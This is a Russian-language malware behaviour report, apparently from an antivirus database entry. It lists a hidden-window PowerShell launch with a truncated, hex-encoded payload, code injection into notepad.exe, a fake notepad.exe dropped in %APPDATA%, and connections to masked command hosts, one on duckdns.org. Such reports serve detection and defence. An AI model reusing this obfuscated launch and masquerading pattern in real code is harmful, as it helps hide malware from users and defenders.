Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden $gh47gh7='92%72%56%87%56%E2%46%16%07%56%47%F6%E6%C5%72%02%B2%14%45%14%44%05%05%14%A3%67%E6%56%42%82%37%37%56%36%F6%27%07%D2%47%27%16%47%37%B3%85%06%54%06%94%C7%72%92%72%72%5...
Внедряет код в
следующие пользовательские процессы:
- notepad.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\notepad.exe
Сетевая активность
Подключается к
- 'gr####ayindia.com':80
TCP
Другие
- 'cs#####o.duckdns.org':672
UDP
- DNS ASK gr####ayindia.com
- DNS ASK cs#####o.duckdns.org
Другое
Создает и запускает на исполнение
- '%APPDATA%\notepad.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden $gh47gh7='92%72%56%87%56%E2%46%16%07%56%47%F6%E6%C5%72%02%B2%14%45%14%44%05%05%14%A3%67%E6%56%42%82%37%37%56%36%F6%27%07%D2%47%27%16%47%37%B3%85%06%54%06%94%C7%72%92%72%72%5...' (со скрытым окном)
